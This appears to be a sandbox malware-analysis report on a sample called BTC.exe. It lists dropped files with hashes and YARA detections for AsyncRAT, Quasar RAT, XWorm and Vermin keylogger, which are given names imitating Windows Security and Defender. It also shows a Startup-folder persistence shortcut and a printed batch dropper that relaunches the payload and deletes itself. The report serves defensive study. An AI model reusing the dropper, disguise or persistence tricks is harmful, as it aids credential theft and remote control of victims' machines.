                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFB78.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):155648
                                                  Entropy (8bit):0.5407252242845243
                                                  Encrypted:false
                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFB84.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):106496
                                                  Entropy (8bit):1.136413900497188
                                                  Encrypted:false
                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFBA4.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.121297215059106
                                                  Encrypted:false
                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFF2F.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.121297215059106
                                                  Encrypted:false
                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFF50.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):51200
                                                  Entropy (8bit):0.8746135976761988
                                                  Encrypted:false
                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFF51.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):155648
                                                  Entropy (8bit):0.5407252242845243
                                                  Encrypted:false
                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFF71.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):98304
                                                  Entropy (8bit):0.08235737944063153
                                                  Encrypted:false
                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFF80.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):98304
                                                  Entropy (8bit):0.08235737944063153
                                                  Encrypted:false
                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFF81.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):5242880
                                                  Entropy (8bit):0.03859996294213402
                                                  Encrypted:false
                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                  MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                  SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                  SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                  SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFFC0.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):5242880
                                                  Entropy (8bit):0.03859996294213402
                                                  Encrypted:false
                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                  MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                  SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                  SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                  SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\xsfg46D0POZr.bat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):211
                                                  Entropy (8bit):5.310413226594109
                                                  Encrypted:false
                                                  SSDEEP:6:hC47bxrBeLuVFOOr+DE19aZ5lSKOZG1923fP:d5r+uVEOCDEmHlIX
                                                  MD5:14DC803A3D4CE999EE6A0DDFE7625D13
                                                  SHA1:13C7A97B0E4547070E91A4456E7E25CCE02E5D7D
                                                  SHA-256:A7D8CCF430E4FB9B4E1AA6DEA6D73716361E8BE599449AAC0BCECE227F9EE7B6
                                                  SHA-512:64AD469A5AE34E801248EB7267A4088595E96FE4110AA5E1B31827E498AAAD0ACB45A9E449EB52C1F1828496AC802A9AEC3FD36D5586558EFED90A28CEBA9EF4
                                                  Malicious:false
                                                  Preview:@echo off..chcp 65001..echo DONT CLOSE THIS WINDOW!..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Roaming\Window Security.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\xsfg46D0POZr.bat"

                                                  C:\Users\user\AppData\Roaming\Cracked.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):75776
                                                  Entropy (8bit):5.801146631564073
                                                  Encrypted:false
                                                  SSDEEP:1536:dU40cxhzjBCViPMVSe9VdQuDI6H1bf/6hQzceLVclN:dU1cxhzVCiPMVSe9VdQsH1bfoQ3BY
                                                  MD5:0DFA83A82F6418C73406D78296DE61BE
                                                  SHA1:DD7ECEEF8A434C43E0751E180BF714E08771D336
                                                  SHA-256:8D27369FFA8B29D561FA9DAF485BE14D2FC00287BB1C69D4C84D514891C8DB5E
                                                  SHA-512:9A4B026250B18C29AB7DD48203F321C2EF2F12695BD2DCB52EBBC15001C8DDF019D5A7E04DA056C50C1881CE269D1810259BF6D04B61F471E8751B7192FC73D4
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Cracked.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\Cracked.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.............................4... ...@....@.. ....................................@.................................D4..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................4......H.......Py..........0....................................................W......H3.......W......3........./.\.....{....*"..}....*..{....*"..}....*..{....*"..}....*.~....(....9.....~....(....(....*.(....*n~....(....~.....(....(....*.r...p.(.....(.....@....(.....A...(....*f.~#...}......}.....($...*..($...*.~....%:....&~....../...sM...%.....sN...(O...~....(.........*.~....o....9 ...~.....(....(G...9....~.....(....*.s................s)........~J...............*.s.........*r~....o

                                                  C:\Users\user\AppData\Roaming\Logs\09-03-2024

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):352
                                                  Entropy (8bit):7.39209892267878
                                                  Encrypted:false
                                                  SSDEEP:6:n4YBH8Amx/ZxzO7gvdEqtaXdeiTGM1qZxIfIRV0L6/ywYvK7ekWS9xkf:nSgGdETXdeiTGkeIfIbPywYvKekWRf
                                                  MD5:D2A2D3ED68BAFAD00874DA12F85A4EE1
                                                  SHA1:DAEEA4D77D3F15AEDBB5C8B80F2A4736E1495422
                                                  SHA-256:4DF53CB5AA79D3491D1F340D9CE9015A9682C6CDD480A274879C4B70A60DC57C
                                                  SHA-512:A2968BFC5586130F8E51EB38C867C528B3C06BE371792CB55E85064907E0535F90202903437BB28AF2E7F422EB6C305E4E985AB14ABE02A6C504191889D22EEC
                                                  Malicious:false
                                                  Preview:+..P.u}.T.....h...........t..sa>YH[.d....`l...$.3{AS..j.S.l......;\\nL.ZP~.|vj.<.U/........@..M,...f.t.=.P..^D.....Gq.E.=..\.k^...J....J}y...oE.?$F...2...b..z`..U (\<...Q..R..o.R/.%...N.".e.....(.<a...W^.h.6...X..Y.2...K7...v..'5W...z(.<...Q.....%.5.x....@7Fl."B..r]Y<.]...|5.o..K....:.&.a'59u..I....P`V.{7{5...Az..T..(5(..v....^...:

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Service Host.lnk

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Sep 3 03:15:54 2024, mtime=Tue Sep 3 03:15:54 2024, atime=Tue Sep 3 03:15:54 2024, length=44032, window=hide
                                                  Category:dropped
                                                  Size (bytes):877
                                                  Entropy (8bit):5.032082188273128
                                                  Encrypted:false
                                                  SSDEEP:12:8sIQl64f0/88CHlsY//kGjLE5OS+oWApjAwEHNEK3W+oWAHC0fmV:8szHf0k8EZ73E9+IAMd+yC0fm
                                                  MD5:A32316447B6FE9D6391A24B3F7AE1BDF
                                                  SHA1:403F13C49080ABB4E21436EA2F35B54F206F751F
                                                  SHA-256:21172DDBCD5EBF9CE82A51DAC7023EF1AB31F65F7B5120913A5DA3F9FDC4DC6C
                                                  SHA-512:39AEA454015F47F93DA376F18D3E61B8EA82C2E28A192592F41EF576E44A2C339D766858CA105F2956151A38A4934523ABBE470A4FEB428216E93F8FF55C777B
                                                  Malicious:false
                                                  Preview:L..................F.... ....k/......BG......k/...............................:..DG..Yr?.D..U..k0.&...&...... M.....t.................t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl#Y.!....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....#Y.!..Roaming.@......DWSl#Y.!....C.....................D.O.R.o.a.m.i.n.g.......2.....#Y.! .WINDOW~2.EXE..t......#Y.!#Y.!....6......................z..W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .S.e.r.v.i.c.e. .H.o.s.t...e.x.e.......p...............-.......o...........A.}R.....C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe..0.....\.....\.....\.....\.....\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .S.e.r.v.i.c.e. .H.o.s.t...e.x.e.`.......X.......936905...........hT..CrF.f4... .D.2=.b...,...W..hT..CrF.f4... .D.2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                  C:\Users\user\AppData\Roaming\MyData\DataLogs.conf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Cracked.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):8
                                                  Entropy (8bit):2.75
                                                  Encrypted:false
                                                  SSDEEP:3:Rt:v
                                                  MD5:CF759E4C5F14FE3EEC41B87ED756CEA8
                                                  SHA1:C27C796BB3C2FAC929359563676F4BA1FFADA1F5
                                                  SHA-256:C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
                                                  SHA-512:C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
                                                  Malicious:false
                                                  Preview:.5.False

                                                  C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):547328
                                                  Entropy (8bit):6.4430733404489215
                                                  Encrypted:false
                                                  SSDEEP:6144:78fG1BIgrx8kFYLTiMkbQEju0KoivMbi7DSVmh6Khe535h+GofOlblwXH/Gy3V8O:HPx7FYPiMQRcRDF4uy33ofAblwX2S
                                                  MD5:81B2C5C64951B603480D40D321540FF2
                                                  SHA1:314199AD92BAEB203F5555FF3814E9B7A4F226F8
                                                  SHA-256:B893220D33F9B8A0F98702BB577E4459792253AE651BDC18A93145CCD008AF54
                                                  SHA-512:3A57655BF7AA18A34364659553AAD26A3D5B8946B957441F5FEDEBAB5936B6BB2C71C6337837EAD486A001B6A9227437CC5C4EC4A5DE627F0E2DB10DC6AFDEA6
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: unknown
                                                  • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: ditekSHen
                                                  • Rule: MALWARE_Win_QuasarRAT, Description: QuasarRAT payload, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{..f.................N..........Nl... ........@.. ....................................@..................................k..W.................................................................................... ............... ..H............text...TL... ...N.................. ..`.rsrc................P..............@..@.reloc...............X..............@..B................0l......H..........,.......h....Q...J...........................................0..........(....r...p(....s....%r...po....%ro..po....%r...po....%ro..po....%r...po....%r...p.r...p(....o....%r...po....o....(....r...p(.....s....%.o....%.o....%.o....%.o....%.o....(....&..&..*....................0..........(....r*..p(....s....%r...po....%ro..po....%r...po....%ro..po....%r...po....%r...p.r...p(....o....%r:..po....o....(....r*..p(.....s....%.o....%.o....%.o....%.o....%.o....(....&..&..*...

                                                  C:\Users\user\AppData\Roaming\Window Security.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):547328
                                                  Entropy (8bit):6.4430733404489215
                                                  Encrypted:false
                                                  SSDEEP:6144:78fG1BIgrx8kFYLTiMkbQEju0KoivMbi7DSVmh6Khe535h+GofOlblwXH/Gy3V8O:HPx7FYPiMQRcRDF4uy33ofAblwX2S
                                                  MD5:81B2C5C64951B603480D40D321540FF2
                                                  SHA1:314199AD92BAEB203F5555FF3814E9B7A4F226F8
                                                  SHA-256:B893220D33F9B8A0F98702BB577E4459792253AE651BDC18A93145CCD008AF54
                                                  SHA-512:3A57655BF7AA18A34364659553AAD26A3D5B8946B957441F5FEDEBAB5936B6BB2C71C6337837EAD486A001B6A9227437CC5C4EC4A5DE627F0E2DB10DC6AFDEA6
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: unknown
                                                  • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: ditekSHen
                                                  • Rule: MALWARE_Win_QuasarRAT, Description: QuasarRAT payload, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{..f.................N..........Nl... ........@.. ....................................@..................................k..W.................................................................................... ............... ..H............text...TL... ...N.................. ..`.rsrc................P..............@..@.reloc...............X..............@..B................0l......H..........,.......h....Q...J...........................................0..........(....r...p(....s....%r...po....%ro..po....%r...po....%ro..po....%r...po....%r...p.r...p(....o....%r...po....o....(....r...p(.....s....%.o....%.o....%.o....%.o....%.o....(....&..&..*....................0..........(....r*..p(....s....%r...po....%ro..po....%r...po....%ro..po....%r...po....%r...p.r...p(....o....%r:..po....o....(....r*..p(.....s....%.o....%.o....%.o....%.o....%.o....(....&..&..*...

                                                  C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):44032
                                                  Entropy (8bit):5.563778957979535
                                                  Encrypted:false
                                                  SSDEEP:384:P/ixLdTHZGdG/lYbgZrExLM/mZ4+11FILihivQ7pkFMAMiLTg9ZZwd/mVvNVqEsh:HQPcGtpE9M/XAFHhIRFe9/4OChkiXr
                                                  MD5:5322A12CB24E83BFA9746FBDE06D07E7
                                                  SHA1:5263A4F26BDA073E9F82DD4FA612EB494DD771C7
                                                  SHA-256:4957D607C2984F94A258DBA088FA1AB85E508BFAABE9279BF8B6BF6F4B97A9BB
                                                  SHA-512:67BFAEF1DDF4AD44218C82C5634E7F726304845FAB1D5361353FDACD8D8D767FEC32C871FA304F4199DDE3F6224BE76C67560A64C1D72BBE20E134C50D1BF058
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, Author: ditekSHen
                                                  Antivirus:
